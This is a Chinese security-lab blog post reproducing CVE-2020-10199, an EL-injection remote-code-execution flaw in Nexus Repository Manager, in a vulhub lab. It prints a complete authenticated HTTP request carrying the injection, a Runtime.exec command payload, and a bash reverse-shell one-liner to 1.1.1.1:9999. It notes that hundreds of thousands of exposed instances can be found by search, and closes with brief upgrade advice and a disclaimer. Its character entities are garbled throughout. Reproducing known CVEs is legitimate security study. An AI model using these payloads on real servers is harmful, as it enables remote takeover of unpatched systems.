java远程执行linux命令_Nexus远程命令执行漏洞CVE202010199

“燕云实验室”是河北千诚电子科技有限公司成立的网络安全攻防技术研究实验室。专注于web安全&＃xff0c;网络攻防&＃xff0c;安全运维&＃xff0c;应急溯源方面的研究&＃xff0c;开发成果应用于产品核心技术转化&＃xff0c;国家重点科技项目攻关。

Nexus 是一个 Maven 的仓库管理系统&＃xff0c;它提供了强大的仓库管理、构件搜索等功能&＃xff0c;并且可以用来搭建 Maven 仓库私服&＃xff0c;在代理远程仓库的同时维护本地仓库&＃xff0c;以节省带宽和时间。

在 Nexus Repository Manager OSS/Pro 3.21.1 及之前的版本中&＃xff0c;经过授权认证的攻击者&＃xff0c;可以通过 JavaEL 表达式注入造成远程代码执行&＃xff0c;获取系统权限。

使用fofa搜索nexus可发现有38w&＃43;个相关资产。

今年3月31日的时候Nexus Repository Manager官方发布了CVE-2020-10199&＃xff0c;CVE-2020-10204的漏洞公告&＃xff0c;两个漏洞均是由Github Secutiry Lab的&＃64;pwntester发现的。其中CVE-2020-10199再获取到管理员权限后&＃xff0c;即可进行远程命令执行。

Nexus Repository Manager OSS/Pro version <&＃61; 3.21.1

我们使用vulhub提供的漏洞docker容器直接开启环境。

cd ~/vulhub/nexus/cve-2020-10199

docker-composer up -d

等待一段时间环境才能成功启动&＃xff0c;访问http://your-ip:8081即可看到Web页面。

该漏洞需要至少普通用户身份&＃xff0c;所以我们需要使用账号密码admin:admin登录后台。

可使用以下payload对nexus进行远程命令执行&＃xff0c;其中NXSESSIONID需要更换为账户登录成功之后的ID&＃xff0c;该ID存在与COOKIE中。

POST /service/rest/beta/repositories/go/group HTTP/1.1Host: 127.0.0.1:8081Content-Length: 203X-Requested-With: XMLHttpRequestX-Nexus-UI: trueUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36NX-ANTI-CSRF-TOKEN: 0.7886248393834028Content-Type: application/jsonAccept: */*Origin: http://127.0.0.1:8081Sec-Fetch-Site: same-originSec-Fetch-Mode: corsReferer: http://127.0.0.1:8081/Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q&＃61;0.9COOKIE: NX-ANTI-CSRF-TOKEN&＃61;0.7886248393834028; NXSESSIONID&＃61;cedf848f-d881-4b58-ac24-9e9c3ece40bcConnection: close{ "name": "internal", "online": true, "storage": { "blobStoreName": "default", "strictContentTypeValidation": true }, "group": { "memberNames": ["$\\A{233*233*233}"] }}

可以看到公式233x233x233计算成功&＃xff0c;替换以下payload即可系统命令执行。

$\\A{&＃39;&＃39;.getClass().forName(&＃39;java.lang.Runtime&＃39;).getMethods()[6].invoke(null).exec(&＃39;touch /tmp/233&＃39;)}

利用构建好的PY脚本&＃xff1a;

linux主机配合&＃xff1a;

bash -i >&/dev/tcp/1.1.1.1/9999 0>&1

命令可反弹shell

目前&＃xff0c;官方已发布新版本修复了该漏洞&＃xff0c;请受影响的用户升级到安全版本。

下载地址&＃xff1a;https://help.sonatype.com/repomanager3/download/ 

END

声明

署名:CC BY-NC-SA 3.0 CN

文中所涉及的技术,思路和工具仅供以安全为目的的学习交流使用&＃xff0c;请勿做非法用途否则后果自负。